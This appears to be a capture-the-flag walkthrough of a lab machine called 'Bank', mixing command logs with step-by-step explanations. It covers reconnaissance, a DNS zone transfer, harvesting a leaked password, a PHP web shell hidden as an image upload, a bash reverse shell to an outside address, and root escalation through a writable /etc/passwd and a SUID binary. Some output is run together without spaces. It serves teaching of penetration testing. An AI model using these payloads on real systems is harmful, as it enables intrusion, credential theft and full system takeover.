Let's sniff the target machine to check if there is any opening to break in.
# Nmap 7.94 scan initiated Sun Nov 12 02:18:04 2023 as: nmap -vvv -Pn -sCV --open -T4 -p0-65535 -oN bank.nmap 10.10.10.29
Nmapscanreportfor10.10.10.29Hostisup,receiveduser-set (0.33s latency).Scannedat2023-11-1202:18:04ESTfor84sNotshown:65533closedtcpports (reset)PORTSTATESERVICEREASONVERSION22/tcpopensshsyn-ackttl63OpenSSH6.6.1p1Ubuntu2ubuntu2.8 (Ubuntu Linux; protocol2.0)|ssh-hostkey:|102408:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)| ssh-dss AAAAB3NzaC1kc3MAAACBAMJ+YATka9wvs0FTz8iNWs6uCiLqSFhmBYoYAorFpozVGkCkU1aEJ7biybFTw/qzS9pbSsaYA+3LyUyvh3BSPGEt1BgGW/H29MuXjkznwVz60JqL4GqaJzYSL3smYYdr3KdJQI/QSvf34WU3pife6LRmJaVk+ETh3wPclyecNtedAAAAFQC1Zb2O2LzvAWf20FdsK8HRPlrx1wAAAIBIBAhLmVd3Tz+o+6Oz39g4Um1le8d3DETINWk3myRvPw8hcnRwAFe1+14h3RX4fr+LKXoR/tYrI138PJyiyl+YtQWhZnJ7j8lqnKRU2YibtnUc44kP9FhUqeAcBNjj4qwG9GyQSWm/Q5CbOokgaa6WfdcnwsUMim0h2Ad8YdU1kAAAAIBy3dOOD8jKHeBdE/oXGG0X9tKSFZv1gPr/kZ7NfqUF0kHU3oZTNK8/2qR0SNHgrZ2cLgKTIuneGS8lauXjC66NNMoUkJcMHpwRkYC0A86LDmhES6OuPsQwAjr1AtUZn97QjYu1d6WPfhTdsRYBuCotgKh2SBkzV1Bcz77Tnp56JA==
|2048b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc0rofjHtpSlqkDjjnkEiYcbUrMH0Q4a6PcxqsR3updDGBWu/RK7AGWRSjPn13uil/nl44XF/fkULy7FoXXskByLCHP8FS2gYJApQMvI9n81ERojEA0NIi6VZKP19bl1VFTk7Q5rEPIpab2xqYMBayb1ch7iP95n3iayvHEt/7cSTsddGWKeALi+rrujpnryNViiOIWpqDv+RWtbc2Wuc/FTeGSOt1LBTbtKcLwEehBG+Ym8o8iKTd+zfVudu7v1g3W2Aa3zLuTcePRKLUK3Q2D7k+5aJnWrekpiARQm3NmMkv1NuDLeW3amVBCv6DRJPBqEgSeGMGsnqkR8CKHO9/
|256a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDH30xnPq1XEub/UFQ2KoHXh9LFKMNMkt60xYF3OrEp1Y5XQd0QyeLXwm6tIqWtb0rWda/ivDgmiB4GzCIMf/HQ=
|2562d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)|_ssh-ed25519AAAAC3NzaC1lZDI1NTE5AAAAIA8MYjFyo+4OwYGTzeuyNd998y6cOx56mIuciim1cvKh53/tcpopendomainsyn-ackttl63ISCBIND9.9.5-3ubuntu0.14 (Ubuntu Linux)|dns-nsid:|_bind.version:9.9.5-3ubuntu0.14-Ubuntu80/tcpopenhttpsyn-ackttl63Apachehttpd2.4.7 ((Ubuntu))|http-methods:|_SupportedMethods:POSTOPTIONSGETHEAD|_http-title:Apache2UbuntuDefaultPage:Itworks|_http-server-header:Apache/2.4.7 (Ubuntu)ServiceInfo:OS:Linux; CPE:cpe:/o:linux:linux_kernelReaddatafilesfrom:/usr/bin/../share/nmapServicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.# Nmap done at Sun Nov 12 02:19:28 2023 -- 1 IP address (1 host up) scanned in 83.86 seconds
The provided Nmap scan result reveals information about a target host with the IP address 10.10.10.29. Here's a breakdown of the findings:
SSH Service (Port 22):
State: Open
Service: SSH (Secure Shell)
Version: OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8
Encryption Key Types:
DSA (Digital Signature Algorithm)
RSA (Rivest-Shamir-Adleman)
ECDSA (Elliptic Curve Digital Signature Algorithm)
ED25519 (Edwards-curve Digital Signature Algorithm)
Operating System: Ubuntu Linux
This indicates that the SSH service is available on the host, allowing secure remote access. The version information can be useful for identifying potential vulnerabilities or compatibility issues.
The Domain service being open suggests that this host is likely responsible for DNS resolution within the network. The version information can help in assessing potential vulnerabilities or compatibility with other DNS systems.
HTTP Service (Port 80):
State: Open
Service: HTTP (Hypertext Transfer Protocol)
Version: Apache httpd 2.4.7 (Ubuntu)
Server Header: Apache/2.4.7 (Ubuntu)
HTTP Methods Supported: POST, OPTIONS, GET, HEAD
HTTP Title: Apache2 Ubuntu Default Page: It works
The HTTP service being open indicates that the host is running a web server, serving content over the HTTP protocol. The version information can be valuable for understanding potential vulnerabilities or compatibility issues with web applications running on this server.
Additional Information:
Latency: The host responded with a latency of 0.33 seconds, indicating a relatively quick response time.
Operating System: Detected as Linux, with the Common Platform Enumeration (CPE) specifying the Linux kernel.
This Nmap scan provides valuable insights into the services running on the target host, allowing for further analysis and potential identification of security risks or areas of interest for further investigation.
DNS
dig
With a standard DNS tool called 'dig' available in Linux, we can pull it off the following DNS recon on the target machine.
# get the domain's zone details with dig from dns server $dig@10.10.10.29bank.htbaxfr; <<>>DiG9.19.17-1-Debian<<>>@10.10.10.29bank.htbaxfr; (1 server found);; global options: +cmdbank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800bank.htb. 604800 IN NS ns.bank.htb.bank.htb. 604800 IN A 10.10.10.29ns.bank.htb. 604800 IN A 10.10.10.29www.bank.htb. 604800 IN CNAME bank.htb.bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800;; Query time: 504 msec;; SERVER: 10.10.10.29#53(10.10.10.29) (TCP);; WHEN: Sun Nov 12 02:49:32 EST 2023;; XFR size: 6 records (messages 1, bytes 171)-------------------------------------------------------------------------------# filter the output a bit more with grep regex$ dig @10.10.10.29 bank.htb axfr | grep -E '(\w+\.)?\w+\.htb' ; <<>> DiG 9.19.17-1-Debian <<>> @10.10.10.29 bank.htb axfrbank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800bank.htb. 604800 IN NS ns.bank.htb.bank.htb. 604800 IN A 10.10.10.29ns.bank.htb. 604800 IN A 10.10.10.29www.bank.htb. 604800 IN CNAME bank.htb.bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800-------------------------------------------------------------------------------# print only the matches with grep -o$ dig @10.10.10.29 bank.htb axfr | grep -oE '(\w+\.)?\w+\.htb' bank.htbbank.htbbank.htbchris.bank.htbbank.htbns.bank.htbbank.htbns.bank.htbwww.bank.htbbank.htbbank.htbbank.htbchris.bank.htb-------------------------------------------------------------------------------# sort and print only unique with sort -u $ dig @10.10.10.29 bank.htb axfr | grep -oE '(\w+\.)?\w+\.htb' | sort -ubank.htbchris.bank.htbns.bank.htbwww.bank.htb-------------------------------------------------------------------------------# translate or replace newline \n with space ' '$ dig @10.10.10.29 bank.htb axfr | grep -oE '(\w+\.)?\w+\.htb' | sort -u | tr '\n' ' 'bank.htb chris.bank.htb ns.bank.htb www.bank.htb -------------------------------------------------------------------------------# manipulate the output the way we want with awk$ dig @10.10.10.29 bank.htb axfr | grep -oE '(\w+\.)?\w+\.htb' | sort -u | tr '\n' ' ' | awk '{print "10.10.10.29\t" $1 " " $2 " " $3 " " $4}'
10.10.10.29 bank.htb chris.bank.htb ns.bank.htb www.bank.htb-------------------------------------------------------------------------------# copy the output to clipboard with xclip instead of print out$ dig @10.10.10.29 bank.htb axfr | grep -oE '(\w+\.)?\w+\.htb' | sort -u | tr '\n' ' ' | awk '{print "10.10.10.29\t" $1 " " $2 " " $3 " " $4}' | xclip -selection clipboard
The series of commands demonstrate the process of retrieving domain zone details using the dig command from a DNS server, filtering the output with grep, sort, and awk, and finally copying the manipulated output to the clipboard using xclip. Here's an explanation of each step:
Original dig Command:
The initial command requests a zone transfer (axfr) for the domain bank.htb from the DNS server located at 10.10.10.29.
Filtered Output with grep:
grep -E '(\w+\.)?\w+\.htb': Filters the output to include only lines containing domain names with the .htb extension.
Print Matches Only with grep -o:
grep -oE '(\w+\.)?\w+\.htb': Prints only the matched domain names, one per line.
Sort and Print Unique Entries with sort -u:
sort -u: Sorts the domain names alphabetically and prints only unique entries.
Translate Newlines to Spaces with tr:
tr '\n' ' ': Translates newline characters to spaces, combining all domain names into a single line.
Manipulate Output with awk:
awk '{print "10.10.10.29\t" $1 " " $2 " " $3 " " $4}': Formats the output to include the DNS server IP address (10.10.10.29) followed by the domain names.
Copy Output to Clipboard with xclip:
xclip -selection clipboard: Copies the manipulated output to the clipboard for easy pasting into other applications.
Overall, this series of commands provides a streamlined way to retrieve domain zone details from a DNS server, filter and manipulate the output, and then copy it to the clipboard for further use. This can be particularly useful for network administrators or security professionals conducting DNS-related investigations or audits.
To make my life a bit easier and work with DNS, I add the following entry to my local Kali machine's /etc/hosts file.
It is a command-line tool called WhatWeb, which is used for web fingerprinting or identifying the technologies used by a website. Here's an analysis of the output:
URL: http://10.10.10.29
This is the URL of the target website being analyzed.
Response Status: [200 OK]
Indicates that the web server responded with a successful HTTP status code, meaning the request was processed without errors.
Web Server: Apache [2.4.7]
Specifies the web server software being used, which in this case is Apache version 2.4.7. Apache is a widely used open-source web server software.
Country: RESERVED [ZZ]
The country field typically provides information about the geographical location of the server based on its IP address. However, in this case, it shows "RESERVED" with the country code "ZZ", which suggests that the country information is not available or reserved.
HTTP Server: Ubuntu Linux [Apache/2.4.7 (Ubuntu)]
Indicates the underlying operating system and its version, which is Ubuntu Linux. Additionally, it mentions that Apache version 2.4.7 is specifically configured for Ubuntu.
IP Address: 10.10.10.29
Specifies the IP address of the target server.
Title: Apache2 Ubuntu Default Page: It works
Provides the title of the webpage, which is the default page served by Apache on an Ubuntu system. This is often displayed when no specific content is configured for the root URL of the web server.
WhatWeb analysis reveals that the target website is hosted on a server running Apache version 2.4.7 on Ubuntu Linux. The default page for Apache on Ubuntu is being served, indicating that the web server is operational and accessible.
Aquatone
# download aquatone from github$wgethttps://github.com/michenriksen/aquatone/releases/download/v1.7.0/aquatone_linux_amd64_1.7.0.zip# unzip the zip file$unzipaquatone_linux_amd64_1.7.0.zip# get the oupt to bank.urls for aquatone$dig@10.10.10.29bank.htbaxfr|grep-oE'(\w+\.)?\w+\.htb'|sort-u>bank.urls# it looks like this$catbank.urlsbank.htbchris.bank.htbns.bank.htbwww.bank.htb# use sed to substitute or put http:// prefix to every line$sed-i's/^/http:\/\//gi'bank.urls# verify the sed output$catbank.urlshttp://bank.htbhttp://chris.bank.htbhttp://ns.bank.htbhttp://www.bank.htb# feed it to aquaton$catbank.urls|./aquatoneaquatonev1.7.0startedat2023-11-12T04:24:36-05:00UsingunreliableGoogleChromeforscreenshots.InstallChromiumforbetterresults.Targets:4Threads:2Ports:80,443,8000,8080,8443Outputdir:.http://ns.bank.htb:200OKhttp://www.bank.htb:200OKhttp://bank.htb:200OKhttp://chris.bank.htb:200OKhttp://ns.bank.htb:screenshotsuccessfulhttp://www.bank.htb:screenshotsuccessfulhttp://bank.htb:screenshotsuccessfulhttp://chris.bank.htb:screenshotsuccessfulCalculatingpagestructures...doneClusteringsimilarpages...doneGeneratingHTMLreport...doneWritingsessionfile...Time:-Startedat:2023-11-12T04:24:36-05:00-Finishedat:2023-11-12T04:24:43-05:00-Duration:7sRequests:-Successful:4-Failed:0-2xx:4-3xx:0-4xx:0-5xx:0Screenshots:-Successful:4-Failed:0WroteHTMLreportto:aquatone_report.html# open aquatone_report.html with firefox$firefoxaquatone_report.html&
It illustrates the process of using Aquatone, a reconnaissance tool, to capture screenshots and generate reports for a list of domain URLs. Here's a breakdown of each step:
Download Aquatone:
Fetches the Aquatone release from GitHub using wget.
Extracts the downloaded Aquatone zip file using unzip.
unzip aquatone_linux_amd64_1.7.0.zip
Retrieve Domain URLs with dig:
Performs a zone transfer for the domain bank.htb from the DNS server at 10.10.10.29, filters and sorts unique domain names, and saves them to a file named bank.urls.
Pipes the contents of bank.urls to Aquatone for scanning.
cat bank.urls | ./aquatone
Open Aquatone HTML Report:
Opens the generated HTML report in a web browser (Firefox) for review.
firefox aquatone_report.html&
These commands demonstrate a streamlined process for using Aquatone to perform reconnaissance on a list of domain URLs, capturing screenshots and generating reports for further analysis.
The output displays the results of a web scan conducted with Gobuster, a popular directory and file brute-forcing tool. Here's an explanation of the scan:
Tool Information:
Gobuster version 3.6 is being used for the scan. Gobuster is a tool used to brute-force: URIs (directories and files) in web sites, DNS subdomains (with wildcard support), Virtual Host names on target web servers, Open Amazon S3 buckets, Open Google Cloud buckets and TFTP servers. Gobuster is useful for pentesters, ethical hackers and forensics experts. It also can be used for security tests.
/balance-transfer: Redirects to http://bank.htb/balance-transfer/
Gobuster successfully identified several directories and paths on the target website http://bank.htb, along with their corresponding status codes and sizes. This information can be valuable for further reconnaissance and vulnerability assessment, allowing security professionals to explore potentially sensitive areas of the web application. Additionally, the presence of directories like "uploads," "assets," and "balance-transfer" may provide avenues for further investigation or exploitation.
The command executes a scan using Nuclei against the target URLs listed in bank.urls. Here's a breakdown of the process and the findings:
Nuclei Installation and Version Check:
Nuclei-templates are installed, and the current version of Nuclei (v3.0.2) and the loaded templates (v9.6.9) are displayed.
Template Execution:
Nuclei executes a total of 7278 templates for the scan, comprising both signed and unsigned templates.
The templates are clustered to reduce the number of requests, resulting in 1252 clusters and 4876 reduced requests.
Targets Loaded and Interactsh Server:
Four targets are loaded for the current scan, which correspond to the URLs listed in bank.urls.
Nuclei utilizes an Interactsh Server at oast.live during the scan.
Detection of HTTP Methods and Web Servers:
Nuclei identifies various HTTP methods supported by the target URLs, such as POST, OPTIONS, GET, and HEAD.
Detection of web servers reveals that the targets are running Apache/2.4.7 on Ubuntu.
Identification of Vulnerabilities and Misconfigurations:
Nuclei detects several vulnerabilities and misconfigurations across the target URLs, including:
Missing security headers like X-Frame-Options, Content-Security-Policy, and Strict-Transport-Security.
Exposure of sensitive files like WEB-INF/web.xml, potentially indicating information disclosure vulnerabilities (e.g., CVE-2021-28164).
Detection of weak SSH configurations, including password authentication and supported authentication methods.
Additional Observations:
Nuclei skips some target URLs (www.bank.htb, ns.bank.htb, chris.bank.htb, bank.htb) due to unresponsiveness after multiple attempts.
The scan provides valuable insights into potential security issues and vulnerabilities present in the target URLs. These findings can aid in securing the web applications and network infrastructure against various threats and attacks. Nuclei proves to be a versatile and effective tool for security scanning, offering comprehensive coverage of web and network security assessment.
Analysis
# number of files ending with .acc$curl-sLhttp://bank.htb/balance-transfer|grep-i'.acc'|wc-l999-------------------------------------------------------------------------------# number of files not ending with .acc$curl-sLhttp://bank.htb/balance-transfer|grep-iv'.acc'|wc-l15-------------------------------------------------------------------------------# get the first 10 line after sorting at second field$ curl -sL http://bank.htb/balance-transfer | grep -i '.acc' | grep -ioE '[a-f0-9]{32}\.acc.*"right">.+ ' | cut -d '>' -f1,7 | tr '">' ' ' | sort -k2 | head
68576f20e9732f1b2edc4df5b8533230.acc25709ed7588d1cd47ffca297cc7dac22c52.acc581941e55bed0cb8052e7015e7133a5b9c7.acc581052a101eac01ccbf5120996cdc60e76d.acc5820d64f03e84187359907569a43c83bddc.acc58210805eead8596309e32a6bfe102f7b2c.acc58220fd5f9690efca3dc465097376b31dd6.acc582346bf50f208571cd9d4c4ec7f8d0b4df.acc58270b43acf0a3e285c423ee9267acaebb2.acc582780a84585b62356360a9495d9ff3a485.acc582-------------------------------------------------------------------------------# stats on the byte sizes$ curl -sL http://bank.htb/balance-transfer | grep -i '.acc' | grep -ioE '[a-f0-9]{32}\.acc.*"right">.+ ' | cut -d '>' -f1,7 | tr '">' ' ' | cut -d ' ' -f3 | sort | uniq -c
125725811158297583590584298585-------------------------------------------------------------------------------# get the one file of 257 byte size $ curl -sL http://bank.htb/balance-transfer | grep -i '.acc' | grep -ioE '[a-f0-9]{32}\.acc.*"right">.+ ' | cut -d '>' -f1,7 | tr '">' ' ' | grep -iE '\b257\b'
68576f20e9732f1b2edc4df5b8533230.acc257-------------------------------------------------------------------------------# check out the file$curl-sLhttp://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc--ERRENCRYPTFAILED+=================+|HTBBankReport|+=================+===UserAccount===FullName:ChristosChristopoulosEmail:chris@bank.htbPassword:!##HTBB4nkP4ssw0rd!##CreditCards:5Transactions:39Balance:8842803.===UserAccount===-------------------------------------------------------------------------------# record the credsvicreds.txtchris@bank.htb:!##HTBB4nkP4ssw0rd!##-------------------------------------------------------------------------------# now login with the username and password at http://bank.htb # you should be able to login to the account# Start looking for the place to upload files since we know that there is a directory for upload. # Go to Support page in Chris's account and test upload a random png file while Burp Suite intercepts the traffic. It will capture the request and response for the upload.
-------------------------------------------------------------------------------# craft the request with first three lines started with PNG magic byte and place php code execution inside the png file as below. Note that \n "Show non-printable chars" must be turned on to see the same output.
<?php system($_REQUEST["cmd"]); ?>-------------------------------------------------------------------------------# with further enumertion, check the source code of bank.htb/support.php page and find there is a DEBUG block in it. <!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
It's a series of actions against the target URL http://bank.htb/balance-transfer. Let's break down each step:
Counting Files Ending with .acc:
It uses curl to fetch the HTML content from the specified URL.
grep is used to filter lines containing .acc case-insensitively.
wc -l counts the number of lines, which corresponds to the number of files ending with .acc.
Result: 999 files ending with .acc.
Counting Files Not Ending with .acc:
Similar to the previous step, but this time grep -iv is used to exclude lines containing .acc.
Result: 15 files not ending with .acc.
Listing Files and Their Sizes:
The script fetches the content, extracts file names and sizes, and sorts them by size.
It uses a combination of grep, cut, tr, sort, and head.
The output lists the first 10 files sorted by size, showing their names and sizes.
Statistics on Byte Sizes:
It retrieves file sizes, counts their occurrences, and sorts them.
grep, cut, tr, sort, and uniq -c are used.
The output displays the count of files for each unique byte size.
Retrieving a Specific File:
It fetches the content, identifies files with a size of 257 bytes, and displays their names.
The output reveals a single file with the specified size.
Viewing the Content of the File:
The script fetches the content of the file 68576f20e9732f1b2edc4df5b8533230.acc.
The content includes sensitive information like full name, email, password, credit card count, transactions count, and balance.
Recording the Credentials:
It records the credentials (chris@bank.htb: !##HTBB4nkP4ssw0rd!##) in a file named creds.txt.
Logging in to the Account:
It suggests logging in to the account using the obtained credentials.
After successful login, it advises looking for the place to upload files, as there is a directory for uploads.
Crafting a Request for File Upload:
It provides instructions for crafting a request to upload a file with PHP code execution inside a PNG file.
Source Code Inspection:
It suggests inspecting the source code of bank.htb/support.php and mentions a debug block added for executing .htb files as PHP for debugging purposes.
It demonstrates a systematic approach to exploring and interacting with a web application, including enumeration of files, extraction of sensitive information, and identification of potential vulnerabilities for further exploitation.
# or you can simply create the implant.png.htb with the following php code <?php system($_REQUEST["cmd"]); ?>-------------------------------------------------------------------------------# verify with curl if php code execution works$curlhttp://bank.htb/uploads/implant.png.htb?cmd=whoamiwww-data-------------------------------------------------------------------------------$curlhttp://bank.htb/uploads/implant.png.htb--data-urlencode'cmd=whoami'www-data
pwncat
# rs with below curl command$curlhttp://bank.htb/uploads/implant.png.htb--data-urlencode'cmd=bash -c "bash -i >& /dev/tcp/10.10.16.3/443 0>&1"'-------------------------------------------------------------------------------# install pwncat$sudoaptinstallpwncat-y-------------------------------------------------------------------------------# pwncat listening at 443 and you get the foothold as www-data user$pwncat-l443bash:cannotsetterminalprocessgroup (1071): Inappropriate ioctl for devicebash:nojobcontrolinthisshell-------------------------------------------------------------------------------# by using find commands looking for unusual SUID setup# /var/htb/bin/emergency is a sort of obvious one in the listwww-data@bank:/var/www/bank/uploads$find/-perm-u=s-typef2>/dev/nullfind/-perm-u=s-typef2>/dev/null/var/htb/bin/emergency/usr/lib/eject/dmcrypt-get-device/usr/lib/openssh/ssh-keysign/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/lib/policykit-1/polkit-agent-helper-1/usr/bin/at/usr/bin/chsh/usr/bin/passwd/usr/bin/chfn/usr/bin/pkexec/usr/bin/newgrp/usr/bin/traceroute6.iputils/usr/bin/gpasswd/usr/bin/sudo/usr/bin/mtr/usr/sbin/uuidd/usr/sbin/pppd/bin/ping/bin/ping6/bin/su/bin/fusermount/bin/mount/bin/umount-------------------------------------------------------------------------------# /etc/passwd is writable by everyone on the boxwww-data@bank:/var/www/bank/uploads$ls-l/etc/passwdls-l/etc/passwd-rw-rw-rw-1rootroot1252May282017/etc/passwd-------------------------------------------------------------------------------# check the sshd config for any attack surface$grepPermitRootLogin/etc/ssh/sshd_config#PermitRootLogin without-passwordPermitRootLoginyes# the setting of "PermitRootLogin without-password".
This sequence of commands and actions depicts steps taken during a penetration testing exercise against a target system (bank.htb). Let's review each step:
Reverse Shell Command:
The curl command is used to send a payload to a potentially vulnerable endpoint (http://bank.htb/uploads/implant.png.htb). The payload is designed to execute a reverse shell back to the attacker's machine by using the bash -c command and redirecting input and output to a specified IP address and port (10.10.16.3:443).
Installation of Pwncat:
The pwncat tool is installed using the system package manager (apt). pwncat is a utility for handling reverse shell connections and is commonly used in penetration testing scenarios.
Listening for Reverse Shell:
pwncat is configured to listen on port 443 for an incoming reverse shell connection. Upon successful connection, the shell is obtained as the www-data user.
Finding SUID Binaries:
The find command is utilised to search for files with the SUID (Set User ID) bit set across the filesystem. The output reveals several binaries with the SUID bit set, including /var/htb/bin/emergency, which could potentially be used for privilege escalation.
Checking Permissions on /etc/passwd:
The permissions of the /etc/passwd file are inspected, indicating that it is writable by all users (rw-rw-rw-). This misconfiguration could allow unauthorised modification of user account information.
Inspecting SSHD Configuration:
The sshd_config file is examined to check the configuration related to SSH login. The output shows that PermitRootLogin is set to yes, which allows root login via SSH. This configuration could pose a security risk if not properly managed.
It's a systematic approach to identifying vulnerabilities and potential attack vectors during a penetration testing engagement. Further steps may involve exploiting discovered vulnerabilities to escalate privileges and gain deeper access to the target system.
Exploits
Writable /etc/passwd
# on the remote machine, get the password hash from openssl as belowwww-data@bank:/var/www/bank/uploads$opensslpasswd-1P@ssword1!opensslpasswd-1P@ssword1!$1$pwkb5t.S$NoHDeEhSIZke0vni9akQK0-------------------------------------------------------------------------------# append your own user to /etc/passwd as root $echo'tyla:$1$pwkb5t.S$NoHDeEhSIZke0vni9akQK0:0:0:gotcha:/root:/bin/bash'>>/etc/passwd-------------------------------------------------------------------------------# verify the entry in /etc/passwd file # it will be the last entry as belowwww-data@bank:/var/www/bank/uploads$cat/etc/passwdcat/etc/passwdtyla:$1$pwkb5t.S$NoHDeEhSIZke0vni9akQK0:0:0:gotcha:/root:/bin/bash-------------------------------------------------------------------------------# now ssh as that user and you are the root$sshtyla@bank.htbTheauthenticityofhost'bank.htb (10.10.10.29)'can't be established.ED25519 key fingerprint is SHA256:7S4JgORJLloHIy/gCCkxvRpbrpWXAlMs8QK2jFtpn/w.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added 'bank.htb' (ED25519) to the list of known hosts.tyla@bank.htb'spassword:WelcometoUbuntu14.04.5LTS (GNU/Linux 4.4.0-79-generici686)SysteminformationasofSunNov1910:00:07EET2023Systemload:0.4Memoryusage:4%Processes:84Usageof/:7.4%of28.42GBSwapusage:0%Usersloggedin:0Graphthisdataandmanagethissystemat:https://landscape.canonical.com/YourHardwareEnablementStack (HWE) is supported untilApril2019.Lastlogin:FriJun1607:44:562017root@bank:~#
This sequence of commands demonstrates a method for achieving privilege escalation by adding a new user to the /etc/passwd file and then accessing the system as the newly created user. Let's break down the steps:
Obtaining Password Hash:
The openssl passwd -1 command is used to generate a password hash for the password "P@ssword1!". The resulting hash is $1$pwkb5t.S$NoHDeEhSIZke0vni9akQK0.
Appending User to /etc/passwd:
The echo command is utilised to append a new user entry to the /etc/passwd file. The entry includes the username "tyla", the password hash obtained earlier, and other necessary fields such as user ID (0 for root), group ID (0 for root), user information, home directory, and shell.
Verifying Entry in /etc/passwd:
The contents of the /etc/passwd file are displayed using the cat command to confirm that the new user entry has been successfully added.
SSH Login as New User:
SSH login is attempted using the newly created user "tyla" with the password "P@ssword1!". Upon successful authentication, access to the system is granted, and the user is logged in as root.
This series of actions highlights a critical misconfiguration in the system where the /etc/passwd file is writable by non-privileged users. By exploiting this misconfiguration, an attacker can effectively add a new user with root privileges, thereby gaining unauthorised access to the system. It underscores the importance of proper file permission management and regular security audits to mitigate such risks.
SUID
# check the file type # it indicates a binary file/var/htb/bin/emergencyfile/var/htb/bin/emergency/var/htb/bin/emergency: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped
-------------------------------------------------------------------------------# now simply execute the binary and see what happens# you are the root/var/htb/bin/emergency/var/htb/bin/emergencyiduid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)whoamiroot
The commands demonstrate the analysis and execution of a binary file named "emergency," leading to privilege escalation to root. Here's a breakdown:
Checking File Type:
The file command is used to determine the type of the binary file located at /var/htb/bin/emergency.
The output indicates that it is a setuid ELF 32-bit LSB (Linux Standard Base) shared object file, designed for the Intel 80386 architecture, and dynamically linked.
Executing the Binary:
The binary file /var/htb/bin/emergency is executed directly.
After execution, the user's identity is checked using the id and whoami commands.
The output shows that the user's effective user ID (euid) has been escalated to 0 (root), granting full root privileges.
Both id and whoami commands confirm that the current user is now "root."
The successful execution of the "emergency" binary results in a privilege escalation, allowing the user "www-data" to gain root access. This indicates a critical security vulnerability, possibly due to misconfigured permissions or a flaw in the binary itself, which can be exploited by attackers to gain unauthorised access and control over the system.
